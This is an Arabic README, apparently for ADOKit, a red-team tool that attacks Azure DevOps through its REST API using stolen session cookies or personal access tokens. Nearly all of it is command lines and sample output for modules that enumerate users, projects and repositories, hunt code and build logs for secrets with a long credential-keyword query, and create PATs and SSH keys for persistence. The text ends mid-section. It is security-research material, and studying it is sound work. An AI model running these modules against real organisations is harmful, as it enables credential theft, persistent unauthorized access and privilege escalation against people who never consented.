
أداة هجوم معيارية تستغل واجهة برمجة تطبيقات Azure DevOps REST للاستطلاع، تصعيد الامتيازات، والاستمرارية باستخدام ملفات تعريف الارتباط المسروقة أو PATs.
أداة هجوم خدمات Azure DevOps - ADOKit هي مجموعة أدوات يمكن استخدامها لمهاجمة خدمات Azure DevOps من خلال الاستفادة من واجهة برمجة التطبيقات REST المتاحة. تتيح الأداة للمستخدم تحديد وحدة هجوم، إلى جانب تحديد بيانات اعتماد صالحة (مفتاح API أو ملف تعريف مصادقة مسروق) لمثيل خدمات Azure DevOps المعني. تشمل وحدات الهجوم المدعومة الاستطلاع، وتصعيد الامتيازات، والثبات. تم بناء ADOKit بطريقة معيارية، بحيث يمكن إضافة وحدات جديدة في المستقبل من قبل مجتمع أمن المعلومات.
التفاصيل الكاملة حول التقنيات المستخدمة بواسطة ADOKit موجودة في الورقة البحثية لـ X-Force Red whitepaper.
شرائح العرض التوضيحي والعروض متضمنة في مجلد BHUSA Arsenal 2024 في هذا المستودع.
تم استخدام المكتبات الخارجية التالية في هذا المشروع.
| المكتبة | الرابط | الترخيص |
|---|---|---|
| Fody | https://github.com/Fody/Fody | رخصة MIT |
| Newtonsoft.Json | https://github.com/JamesNK/Newtonsoft.Json | رخصة MIT |
اتبع الخطوات أدناه لإعداد Visual Studio لتجميع المشروع بنفسك. يتطلب ذلك مكتبتين .NET يمكن تثبيتهما من مدير حزم NuGet.
https://api.nuget.org/v3/index.jsonInstall-Package Costura.Fody -Version 3.3.3Install-Package Newtonsoft.Json"pw OR pwd OR passwrod OR password OR \"-----BEGIN PGP PRIVATE KEY BLOCK-----\" OR \"-----BEGIN EC PRIVATE KEY-----\" OR \"-----BEGIN DSA PRIVATE KEY-----\" OR \"-----BEGIN OPENSSH PRIVATE KEY-----\" OR \"-----BEGIN RSA PRIVATE KEY-----\" OR ANSIBLE_VAULT OR AWS_ACCESS_KEY_ID OR AWS_SECRET_ACCESS_KEY OR ACCESS_TOKEN OR API_KEY OR Authorization OR db_password"فيما يلي خيارات المصادقة المتاحة لك مع ADOKit عند المصادقة على مثيل Azure DevOps.
UserAuthentication على جهاز المستخدم لنطاق .dev.azure.com.
/credential:UserAuthentication=ABC123AadAuthentication على جهاز المستخدم لنطاق .dev.azure.com.
/credential:eyJ0.../credential:apiToken"aud":"https://management.core.windows.net/" أو Azure Devops - "aud":"499b84ac-1321-427f-aa17-267ca6975798"
/credential:eyJ0..يوضح الجدول أدناه الصلاحيات المطلوبة لكل وحدة.
تنفيذ فحص المصادقة للتأكد من أن المؤسسة تستخدم Azure DevOps وأن بيانات الاعتماد المقدمة صالحة.
قم بتوفير الوحدة check، إلى جانب أي معلومات مصادقة ذات صلة وعنوان URL. سيقوم ذلك بإخراج ما إذا كانت المؤسسة المقدمة تستخدم Azure DevOps أم لا، وإذا كان الأمر كذلك، فسيحاول التحقق من صحة بيانات الاعتماد المقدمة.
ADOKit.exe check /credential:apiKey /url:https://dev.azure.com/organizationName
ADOKit.exe check /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName
C:>ADOKit.exe check /credential:apiKey /url:https://dev.azure.com/YourOrganization
================================================== Module: check Auth Type: API Key Search Term: Target URL: https://dev.azure.com/YourOrganization
[*] INFO: Checking if organization provided uses Azure DevOps
[+] SUCCESS: Organization provided exists in Azure DevOps
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
3/28/23 19:33:02 Finished execution of check
### Whoami
#### حالة الاستخدام
> *احصل على المستخدم الحالي وعضويات المجموعة الخاصة بالمستخدم*
#### الصيغة
قم بتوفير الوحدة `whoami`، إلى جانب أي معلومات مصادقة ذات صلة وعنوان URL. سيقوم هذا بإخراج المستخدم الحالي وجميع عضويات مجموعته.
`ADOKit.exe whoami /credential:apiKey /url:https://dev.azure.com/organizationName`
`ADOKit.exe whoami /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName`
#### مثال على الإخراج```
C:\>ADOKit.exe whoami /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization
==================================================
Module: whoami
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/4/2023 11:33:12 AM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
Username | Display Name | UPN
------------------------------------------------------------------------------------------------------------------------------------------------------------
jsmith | John Smith | [email protected]
[*] INFO: Listing group memberships for the current user
Group UPN | Display Name | Description
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
[YourOrganization]\Project Collection Test Service Accounts | Project Collection Test Service Accounts | Members of this group should include the service accounts used by the test controllers set up for this project collection.
[TestProject2]\Contributors | Contributors | Members of this group can add, modify, and delete items within the team project.
[MaraudersMap]\Contributors | Contributors | Members of this group can add, modify, and delete items within the team project.
[YourOrganization]\Project Collection Administrators | Project Collection Administrators | Members of this application group can perform all privileged operations on the Team Project Collection.
4/4/23 15:33:19 Finished execution of whoami
استرداد المنظمات باستخدام رمز وصول معين.
قم بتوفير الوحدة listorgs مع معلومات المصادقة المطلوبة. افتراضيًا، يسرد هذا الأمر فقط المنظمات التي يمكن الوصول إليها باستخدام رمز الوصول المقدم.
/mode:aad لتعداد جميع منظمات DevOps داخل مستأجر Azure AD، بغض النظر عن الوصول المباشر./endpoint:ENDPOINT_NAME لتحديد نقطة نهاية AEX مخصصة.
"X-VSS-DeploymentAffinity" من aex.dev.azure.com.ADOKit.exe listorgs /credential:"eyj0..." [/mode:aad] [/endpoint:ENDPOINT_NAME]
ADOKit.exe listorgs /credential:"eyj0..." /mode:aad /endpoint:aexprodeus21
C:>ADOKit.exe listorgs /credential:"eyj0..."
================================================== Module: listorgs Auth Type: Azure Access Token Target URL: https://app.vssps.visualstudio.com
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
Organization ID | Organization Name
390a7474-e2f2-4b98-b538-4a547fa9f5e3 | solar-devops
b63b999f-43f2-48c5-998d-b31cbf4c2f8e | lunar-devops
### سرد المستودعات
#### حالة الاستخدام
> *اكتشاف المستودعات المستخدمة في مثيل Azure DevOps*
#### الصيغة
قم بتوفير الوحدة `listrepo`، بالإضافة إلى أي معلومات توثيق وعنوان URL ذي صلة. سيؤدي هذا إلى إخراج اسم المستودع وعنوان URL الخاص به.
`ADOKit.exe listrepo /credential:apiKey /url:https://dev.azure.com/organizationName`
`ADOKit.exe listrepo /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName`
#### مثال على الإخراج```
C:\>ADOKit.exe listrepo /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization
==================================================
Module: listrepo
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 3/29/2023 8:41:50 AM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
Name | URL
-----------------------------------------------------------------------------------
TestProject2 | https://dev.azure.com/YourOrganization/TestProject2/_git/TestProject2
MaraudersMap | https://dev.azure.com/YourOrganization/MaraudersMap/_git/MaraudersMap
SomeOtherRepo | https://dev.azure.com/YourOrganization/ProjectWithMultipleRepos/_git/SomeOtherRepo
AnotherRepo | https://dev.azure.com/YourOrganization/ProjectWithMultipleRepos/_git/AnotherRepo
ProjectWithMultipleRepos | https://dev.azure.com/YourOrganization/ProjectWithMultipleRepos/_git/ProjectWithMultipleRepos
TestProject | https://dev.azure.com/YourOrganization/TestProject/_git/TestProject
3/29/23 12:41:53 Finished execution of listrepo
البحث عن المستودعات حسب اسم المستودع في مثيل Azure DevOps
قدّم وحدة searchrepo ومعايير البحث الخاصة بك في وسيط سطر الأوامر /search:، إلى جانب أي معلومات مصادقة ذات صلة وعنوان URL. سيقوم هذا بإخراج اسم المستودع المطابق وعنوان URL.
ADOKit.exe searchrepo /credential:apiKey /url:https://dev.azure.com/organizationName /search:cred
ADOKit.exe searchrepo /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /search:cred
C:>ADOKit.exe searchrepo /credential:apiKey /url:https://dev.azure.com/YourOrganization /search:"test"
================================================== Module: searchrepo Auth Type: API Key Search Term: test Target URL: https://dev.azure.com/YourOrganization
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
Name | URL
TestProject2 | https://dev.azure.com/YourOrganization/TestProject2/_git/TestProject2
TestProject | https://dev.azure.com/YourOrganization/TestProject/_git/TestProject
3/29/23 13:26:59 Finished execution of searchrepo
### قائمة المشاريع
#### حالة الاستخدام
> *اكتشاف المشاريع المستخدمة في مثيل Azure DevOps*
#### الصيغة
قم بتوفير وحدة `listproject`، إلى جانب أي معلومات مصادقة ذات صلة و URL. سيؤدي ذلك إلى إخراج اسم المشروع، والرؤية (عام أو خاص) و URL.
`ADOKit.exe listproject /credential:apiKey /url:https://dev.azure.com/organizationName`
`ADOKit.exe listproject /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName`
#### مثال على الإخراج```
C:\>ADOKit.exe listproject /credential:apiKey /url:https://dev.azure.com/YourOrganization
==================================================
Module: listproject
Auth Type: API Key
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/4/2023 7:44:59 AM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
Name | Visibility | URL
-----------------------------------------------------------------------------------------------------
TestProject2 | private | https://dev.azure.com/YourOrganization/TestProject2
MaraudersMap | private | https://dev.azure.com/YourOrganization/MaraudersMap
ProjectWithMultipleRepos | private | https://dev.azure.com/YourOrganization/ProjectWithMultipleRepos
TestProject | private | https://dev.azure.com/YourOrganization/TestProject
4/4/23 11:45:04 Finished execution of listproject
البحث عن المشاريع حسب اسم المشروع في مثيل Azure DevOps
قم بتوفير وحدة searchproject ومعايير البحث الخاصة بك في وسيط سطر الأوامر /search:، إلى جانب أي معلومات توثيق ذات صلة وعنوان URL. سيؤدي ذلك إلى إخراج اسم المشروع المطابق والرؤية (عام أو خاص) وعنوان URL.
ADOKit.exe searchproject /credential:apiKey /url:https://dev.azure.com/organizationName /search:cred
ADOKit.exe searchproject /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /search:cred
C:>ADOKit.exe searchproject /credential:apiKey /url:https://dev.azure.com/YourOrganization /search:"map"
================================================== Module: searchproject Auth Type: API Key Search Term: map Target URL: https://dev.azure.com/YourOrganization
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
Name | Visibility | URL
MaraudersMap | private | https://dev.azure.com/YourOrganization/MaraudersMap
4/4/23 11:45:31 Finished execution of searchproject
### بحث الكود
#### حالة الاستخدام
> *ابحث عن كود يحتوي على كلمة مفتاحية معينة في مثيل Azure DevOps*
#### الصيغة
قم بتوفير وحدة `searchcode` ومعايير البحث الخاصة بك في الوسيط `/search:` في سطر الأوامر، بالإضافة إلى أي معلومات مصادقة ذات صلة وعنوان URL. سيؤدي هذا إلى إخراج عنوان URL لملف الكود المطابق، إلى جانب السطر في الكود الذي تطابق.
`ADOKit.exe searchcode /credential:apiKey /url:https://dev.azure.com/organizationName /search:password`
`ADOKit.exe searchcode /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /search:password`
#### مثال على الإخراج```
C:\>ADOKit.exe searchcode /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization /search:"password"
==================================================
Module: searchcode
Auth Type: Cookie
Search Term: password
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 3/29/2023 3:22:21 PM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
[>] URL: https://dev.azure.com/YourOrganization/MaraudersMap/_git/MaraudersMap?path=/Test.cs
|_ Console.WriteLine("PassWord");
|_ this is some text that has a password in it
[>] URL: https://dev.azure.com/YourOrganization/TestProject2/_git/TestProject2?path=/Program.cs
|_ Console.WriteLine("PaSsWoRd");
[*] Match count : 3
3/29/23 19:22:22 Finished execution of searchcode
البحث عن الملفات في المستودعات التي تحتوي على كلمة مفتاحية في اسم الملف في Azure DevOps
قم بتوفير وحدة searchfile ومعايير البحث الخاصة بك في وسيط سطر الأوامر /search:، إلى جانب أي معلومات مصادقة ذات صلة وعنوان URL. سيقوم هذا بإخراج عنوان URL للملف المطابق في المستودع الخاص به.
ADOKit.exe searchfile /credential:apiKey /url:https://dev.azure.com/organizationName /search:azure-pipeline
ADOKit.exe searchfile /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /search:azure-pipeline
C:>ADOKit.exe searchfile /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization /search:"test"
================================================== Module: searchfile Auth Type: Cookie Search Term: test Target URL: https://dev.azure.com/YourOrganization
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
File URL
https://dev.azure.com/YourOrganization/MaraudersMap/_git/4f159a8e-5425-4cb5-8d98-31e8ac86c4fa?path=/Test.cs https://dev.azure.com/YourOrganization/ProjectWithMultipleRepos/_git/c1ba578c-1ce1-46ab-8827-f245f54934e9?path=/Test.cs https://dev.azure.com/YourOrganization/TestProject/_git/fbcf0d6d-3973-4565-b641-3b1b897cfa86?path=/test.cs
3/29/23 15:28:37 Finished execution of searchfile
### بحث بيانات الاعتماد
#### حالة الاستخدام
> *ابحث عن كود يحتوي على أسرار مثل كلمات المرور أو مفاتيح API في Azure DevOps*
#### الصيغة
قم بتوفير وحدة `creds`، بالإضافة إلى أي معلومات مصادقة ذات صلة وعنوان URL. سيقوم هذا بإخراج عنوان URL للملف المطابق في المستودع الخاص به، والسطر (الأسطر) المطابقة حيث توجد بيانات الاعتماد.
`ADOKit.exe creds /credential:apiKey /url:https://dev.azure.com/organizationName`
`ADOKit.exe creds /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName`
#### مثال للإخراج```
C:\>ADOKit.exe creds /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization
==================================================
Module: creds
Auth Type: Cookie
Search Term: pw OR pwd OR passwrod OR password OR \"-----BEGIN PGP PRIVATE KEY BLOCK-----\" OR \"-----BEGIN EC PRIVATE KEY-----\" OR \"-----BEGIN DSA PRIVATE KEY-----\" OR \"-----BEGIN OPENSSH PRIVATE KEY-----\" OR \"-----BEGIN RSA PRIVATE KEY-----\" OR ANSIBLE_VAULT OR AWS_ACCESS_KEY_ID OR AWS_SECRET_ACCESS_KEY OR ACCESS_TOKEN OR API_KEY OR Authorization OR db_password
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 3/30/2023 10:17:49 AM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
[>] URL: https://dev.azure.com/YourOrganization/MaraudersMap/_git/MaraudersMap?path=/Test.cs
|_ Console.WriteLine("PassWord");
|_ this is some text that has a password in it
[>] URL: https://dev.azure.com/YourOrganization/MaraudersMap/_git/MaraudersMap?path=/Test.cs
|_ API_KEY=ABC123
[>] URL: https://dev.azure.com/YourOrganization/TestProject2/_git/TestProject2?path=/Program.cs
|_ Console.WriteLine("PaSsWoRd");
[>] URL: https://dev.azure.com/YourOrganization/ProjectWithMultipleRepos/_git/AnotherRepo?path=/config.yaml
|_ Password: ItIsSuperSecret!
[*] Match count : 5
3/30/23 14:17:54 Finished execution of creds
قم بتنزيل سجلات جميع عمليات خط الأنابيب (سجلات البناء). يمكنك بعد ذلك البحث دون اتصال عن المعلومات و/أو الأسرار.
قم بتوفير وحدة getbuildlogs مع /project: لمشروع معين لتنزيل جميع سجلات البناء لهذا المشروع. إذا كنت ترغب في تنزيلها لجميع المشاريع، فحدد all في وسيط /project:. سيؤدي هذا إلى إنشاء مجلد باسم ADOKit-[random 8 chars] في دليل العمل الحالي الخاص بك لتنزيل السجلات إليه.
ADOKit.exe getbuildlogs /credential:apiKey /url:https://dev.azure.com/organizationName /project:"someProject"
ADOKit.exe getbuildlogs /credential:apiKey /url:https://dev.azure.com/organizationName /project:"all"
ADOKit.exe getbuildlogs /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/organizationName /project:"someProject"
ADOKit.exe getbuildlogs /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/organizationName /project:"all"
C:>ADOKit.exe getbuildlogs /credential:apiKey /url:https://dev.azure.com/YourOrganization /project:TestProject2
================================================== Module: getbuildlogs Auth Type: API Key Project: TestProject2 Target URL: https://dev.azure.com/YourOrganization
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
[*] INFO: Downloading build logs to: C:\path\ADOKit-MWPsicSZ
[+] SUCCESS: Build log files downloaded to: C:\path\ADOKit-MWPsicSZ
### قائمة سجلات البناء
#### حالة الاستخدام
> *قم بإدراج سجلات البناء المتاحة لمشروع معين أو لجميع المشاريع.*
#### الصيغة
قم بتوفير وحدة `listbuildlogs` مع `/project:` لمشروع معين لإدراج جميع سجلات البناء لهذا المشروع. إذا كنت ترغب في إدراجها لجميع المشاريع، فحدد `all` في الوسيطة `/project:`.
`ADOKit.exe listbuildlogs /credential:apiKey /url:https://dev.azure.com/organizationName /project:"someProject"`
`ADOKit.exe listbuildlogs /credential:apiKey /url:https://dev.azure.com/organizationName /project:"all"`
`ADOKit.exe listbuildlogs /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/organizationName /project:"someProject"`
`ADOKit.exe listbuildlogs /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/organizationName /project:"all"`
#### مثال على الإخراج```
C:\>ADOKit.exe listbuildlogs /credential:apiKey /url:https://dev.azure.com/YourOrganization /project:TestProject2
==================================================
Module: listbuildlogs
Auth Type: API Key
Project: TestProject2
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 5/31/2024 8:14:57 AM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
Build ID | Build Name | Num Logs | URL
-------------------------------------------------------------------------------------------------------------
94 | TestProject2 | 10 | https://dev.azure.com/YourOrganization/8f555d6f-88d2-414a-a9e9-55b1aef12173/_apis/build/Builds/94
92 | TestProject2 | 10 | https://dev.azure.com/YourOrganization/8f555d6f-88d2-414a-a9e9-55b1aef12173/_apis/build/Builds/92
64 | TestProject2 | 10 | https://dev.azure.com/YourOrganization/8f555d6f-88d2-414a-a9e9-55b1aef12173/_apis/build/Builds/64
البحث عن سجلات البناء التي تحتوي على كلمة مفتاحية معينة في مثيل Azure DevOps
قم بتوفير الوحدة searchbuildlogs ومعايير البحث الخاصة بك في وسيط سطر الأوامر /search:، بالإضافة إلى /project: لمشروع معين للبحث في جميع سجلات البناء لهذا المشروع. إذا كنت ترغب في البحث في سجلات البناء لجميع المشاريع، حدد all في وسيط /project:. سيقوم هذا بإخراج الرابط إلى ملف سجل مخرجات البناء المطابق، بالإضافة إلى السطر في سجل البناء الذي تطابق.
ADOKit.exe searchbuildlogs /credential:apiKey /url:https://dev.azure.com/organizationName /project:"projName" /search:"password"
ADOKit.exe searchbuildlogs /credential:apiKey /url:https://dev.azure.com/organizationName /project:"all" /search:"password"
ADOKit.exe searchbuildlogs /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"projName" /search:"password"
ADOKit.exe searchbuildlogs /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"all" /search:"password"
C:>ADOKit.exe searchbuildlogs /credential:apiKey /url:https://dev.azure.com/YourOrganization /project:MaraudersMap /search:"password"
================================================== Module: searchbuildlogs Auth Type: API Key Search Term: password Project: MaraudersMap Target URL: https://dev.azure.com/YourOrganization
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
[*] INFO: Searching build logs
[>] URL: https://dev.azure.com/YourOrganization/ee8c003f-94e1-40a7-8d97-0192dcf1b87a/_apis/build/builds/95/logs/1 [>] Project: MaraudersMap |_ python blah.py $(secret-password-here)
[>] URL: https://dev.azure.com/YourOrganization/ee8c003f-94e1-40a7-8d97-0192dcf1b87a/_apis/build/builds/95/logs/7 [>] Project: MaraudersMap |_ 2023-04-21T14:36:48.8967630Z Downloading secret value for: secret-password-here.
[>] URL: https://dev.azure.com/YourOrganization/ee8c003f-94e1-40a7-8d97-0192dcf1b87a/_apis/build/builds/95/logs/8 [>] Project: MaraudersMap |_ 2023-04-21T14:36:50.1585893Z Password1
-----------SNIP-----------
[*] Match count : 9
### إنشاء PAT
#### حالة الاستخدام
> *إنشاء رمز وصول شخصي (PAT) لمستخدم يمكن استخدامه للاستمرارية في مثيل Azure DevOps.*
#### الصيغة
قم بتوفير الوحدة `createpat`، بالإضافة إلى أي معلومات مصادقة ذات صلة وعنوان URL. سيؤدي ذلك إلى إخراج معرف PAT، الاسم، النطاق، تاريخ الصلاحية، ومحتوى الرمز الخاص بـ PAT الذي تم إنشاؤه. سيكون اسم PAT الذي تم إنشاؤه `ADOKit-` متبوعًا بسلسلة عشوائية من 8 أحرف. سيكون تاريخ صلاحية PAT هو عام واحد من تاريخ الإنشاء، وهو الحد الأقصى الذي يسمح به Azure DevOps.
`ADOKit.exe createpat /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName`
#### مثال على المخرجات```
C:\>ADOKit.exe createpat /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization
==================================================
Module: createpat
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 3/31/2023 2:33:09 PM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
PAT ID | Name | Scope | Valid Until | Token Value
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
8776252f-9e03-48ea-a85c-f880cc830898 | ADOKit-rJxzpZwZ | app_token | 3/31/2024 12:00:00 AM | tokenValueWouldBeHere
3/31/23 18:33:10 Finished execution of createpat
سرد جميع رموز الوصول الشخصية (PAT) لمستخدم معين في مثيل Azure DevOps.
قم بتوفير الوحدة listpat، بالإضافة إلى أي معلومات مصادقة ذات صلة وعنوان URL. سيؤدي ذلك إلى إخراج معرف PAT، واسمه، ونطاقه، وتاريخ صلاحيته لجميع رموز PAT النشطة للمستخدم.
ADOKit.exe listpat /credential:apiKey /url:https://dev.azure.com/organizationName
ADOKit.exe listpat /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName
C:>ADOKit.exe listpat /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization
================================================== Module: listpat Auth Type: Cookie Search Term: Target URL: https://dev.azure.com/YourOrganization
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
PAT ID | Name | Scope | Valid Until
9b354668-4424-4505-a35f-d0989034da18 | test-token | app_token | 4/29/2023 1:20:45 PM
8776252f-9e03-48ea-a85c-f880cc830898 | ADOKit-rJxzpZwZ | app_token | 3/31/2024 12:00:00 AM
3/31/23 18:33:18 Finished execution of listpat
### إزالة PAT
#### حالة الاستخدام
> *إزالة PAT لمستخدم معين في مثيل Azure DevOps.*
#### الصيغة
قم بتوفير الوحدة النمطية `removepat`، إلى جانب أي معلومات مصادقة ذات صلة وعنوان URL. بالإضافة إلى ذلك، قم بتوفير معرف PAT في الوسيطة `/id:`. سيقوم هذا بإخراج ما إذا تمت إزالة PAT أم لا، ثم سيقوم بإدراج PATs النشطة الحالية للمستخدم بعد إجراء الإزالة.
`ADOKit.exe removepat /credential:apiKey /url:https://dev.azure.com/organizationName /id:000-000-0000...`
`ADOKit.exe removepat /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /id:000-000-0000...`
#### مثال الإخراج```
C:\>ADOKit.exe removepat /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization /id:0b20ac58-fc65-4b66-91fe-4ff909df7298
==================================================
Module: removepat
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/3/2023 11:04:59 AM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
[+] SUCCESS: PAT with ID 0b20ac58-fc65-4b66-91fe-4ff909df7298 was removed successfully.
PAT ID | Name | Scope | Valid Until
-------------------------------------------------------------------------------------------------------------------------------------------
9b354668-4424-4505-a35f-d0989034da18 | test-token | app_token | 4/29/2023 1:20:45 PM
4/3/23 15:05:00 Finished execution of removepat
إنشاء مفتاح SSH لمستخدم يمكن استخدامه للاستمرارية إلى مثيل Azure DevOps.
قم بتوفير الوحدة النمطية createsshkey، إلى جانب أي معلومات مصادقة ذات صلة وعنوان URL. بالإضافة إلى ذلك، قم بتوفير مفتاح SSH العام الخاص بك في الوسيطة /sshkey:. سيقوم هذا بإخراج معرف مفتاح SSH، والاسم، والنطاق، والتاريخ الصالح حتى، وآخر 20 حرفًا من المفتاح العام لمفتاح SSH الذي تم إنشاؤه. سيكون اسم مفتاح SSH الذي تم إنشاؤه هو ADOKit- متبوعًا بسلسلة عشوائية مكونة من 8 أحرف. سيكون تاريخ صلاحية مفتاح SSH هو عام واحد من تاريخ الإنشاء، حيث أن هذا هو الحد الأقصى الذي يسمح به Azure DevOps.
ADOKit.exe createsshkey /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /sshkey:"ssh-rsa ABC123"
C:>ADOKit.exe createsshkey /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization /sshkey:"ssh-rsa ABC123"
================================================== Module: createsshkey Auth Type: Cookie Search Term: Target URL: https://dev.azure.com/YourOrganization
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
SSH Key ID | Name | Scope | Valid Until | Public SSH Key
fbde9f3e-bbe3-4442-befb-c2ddeab75c58 | ADOKit-iCBfYfFR | app_token | 4/3/2024 12:00:00 AM | ...hOLNYMk5LkbLRMG36RE=
4/3/23 18:51:24 Finished execution of createsshkey
### قائمة مفاتيح SSH
#### حالة الاستخدام
> *قائمة بجميع مفاتيح SSH العامة لمستخدم معين في مثيل Azure DevOps.*
#### الصيغة
قم بتوفير وحدة `listsshkey`، بالإضافة إلى أي معلومات مصادقة ذات صلة وعنوان URL. سيؤدي ذلك إلى إخراج معرف مفتاح SSH، الاسم، النطاق، والتاريخ الصالح حتى لجميع مفاتيح SSH النشطة للمستخدم. بالإضافة إلى ذلك، سيطبع آخر 20 حرفًا من مفتاح SSH العام.
`ADOKit.exe listsshkey /credential:apiKey /url:https://dev.azure.com/organizationName`
`ADOKit.exe listsshkey /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName`
#### مثال على الإخراج```
C:\>ADOKit.exe listsshkey /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization
==================================================
Module: listsshkey
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/3/2023 11:37:10 AM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
SSH Key ID | Name | Scope | Valid Until | Public SSH Key
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------
ec056907-9370-4aab-b78c-d642d551eb98 | test-ssh-key | app_token | 4/3/2024 3:13:58 PM | ...nDoYAPisc/pEFArVVV0=
4/3/23 15:37:11 Finished execution of listsshkey
إزالة مفتاح SSH لمستخدم معين في مثيل Azure DevOps.
قم بتوفير الوحدة النمطية removesshkey، إلى جانب أي معلومات مصادقة ذات صلة وعنوان URL. بالإضافة إلى ذلك، قم بتوفير معرف مفتاح SSH في الوسيطة /id:. سيخرج هذا ما إذا تم إزالة مفتاح SSH أم لا، ثم سيقوم بإدراج مفاتيح SSH النشطة الحالية للمستخدم بعد تنفيذ الإزالة.
ADOKit.exe removesshkey /credential:apiKey /url:https://dev.azure.com/organizationName /id:000-000-0000...
ADOKit.exe removesshkey /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /id:000-000-0000...
C:>ADOKit.exe removesshkey /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization /id:a199c036-d7ed-4848-aae8-2397470aff97
================================================== Module: removesshkey Auth Type: Cookie Search Term: Target URL: https://dev.azure.com/YourOrganization
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
[+] SUCCESS: SSH key with ID a199c036-d7ed-4848-aae8-2397470aff97 was removed successfully.
SSH Key ID | Name | Scope | Valid Until | Public SSH Key
ec056907-9370-4aab-b78c-d642d551eb98 | test-ssh-key | app_token | 4/3/2024 3:13:58 PM | ...nDoYAPisc/pEFArVVV0=
4/3/23 17:50:09 Finished execution of removesshkey
### قائمة المستخدمين
#### حالة الاستخدام
> *قائمة المستخدمين داخل مثيل Azure DevOps*
#### الصيغة
قم بتوفير الوحدة النمطية `listuser`، إلى جانب أي معلومات مصادقة ذات صلة وعنوان URL. سيقوم هذا بإخراج اسم المستخدم واسم العرض واسم المستخدم الرئيسي.
`ADOKit.exe listuser /credential:apiKey /url:https://dev.azure.com/organizationName`
`ADOKit.exe listuser /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName`
#### مثال على الإخراج```
C:\>ADOKit.exe listuser /credential:apiKey /url:https://dev.azure.com/YourOrganization
==================================================
Module: listuser
Auth Type: API Key
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/3/2023 4:12:07 PM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
Username | Display Name | UPN
------------------------------------------------------------------------------------------------------------------------------------------------------------
user1 | User 1 | [email protected]
jsmith | John Smith | [email protected]
rsmith | Ron Smith | [email protected]
user2 | User 2 | [email protected]
4/3/23 20:12:08 Finished execution of listuser
البحث عن مستخدم (مستخدمين) محددين في مثيل Azure DevOps
